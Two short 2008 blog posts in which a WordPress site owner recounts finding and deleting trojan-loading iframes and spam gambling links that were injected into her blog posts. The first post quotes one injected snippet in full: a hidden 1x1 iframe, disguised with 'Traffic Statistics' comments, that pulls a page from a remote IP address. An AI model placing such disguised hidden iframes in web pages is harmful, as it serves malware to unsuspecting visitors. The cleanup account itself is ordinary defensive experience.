Posted by admin on
September 4, 2008
Follow up to “Trojan on Wordpress Blog” article
OK, I thought I was safe… (don’t we all?)
Except… one of my blogs, http://www.sophieschoice.org was attacked. Google flagged it, it took me a long time to even get to it… on the back door.
I searched for the iframe tags, removed them all, notified google that it was cleaned. In about 2 weeks they removed the block… today I checked it, and there you go, another trojan, this time it says:
<!– Traffic Statistics –> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –>
Now, I haven’t checked if they infected wordpress own traffic checker program, or got into my site… yet. I’ll do that and follow up again.
The removal was easy… I went into “manage posts” and made a search for “iframe” and it gave me one blog post, I went into the html format and just simply deleted it.
I checked the “src” url in my browser and indeed the trojan was coming from there.
I’ll continue the saga… Now I have to check all my blogs… what a drag.
Posted by admin on
May 24, 2008
Trojan On Wordpress Blog - How I Got Rid Of It
One of my blogs got hacked a week or so ago.
When I opened it a warning came up, that a Trojan (worm… not a virus… but just as annoying) was on my site…
I made a screen shot of some of the popup… I just needed the data… to search on google or on wordpress… or whereever.
I didn’t find anything meaningful on the internet, so I decided to move the whole blog to another server. To my dismay, the popup warning me of the trojan was still there.
I decided that the trojan must be somewhere in my posts…
I searched all my posts, one by one, in “html” mode, and I found one instance of the trojan embedded in an iframe, and 7 instances of links to some gambling site.
I was searching for the word “iframe” and for the word “Noscript”
With that search I found all occurrences and now I have a healthy blog… though spent a few hours with moving and setting up on a new location… but all is well when it ends well.
Sophie BenShitta Maven is a Renaissance Woman... architect, publisher, photographer, coach, marketer, teacher, but most importantly the archetype of the Pathfinder.
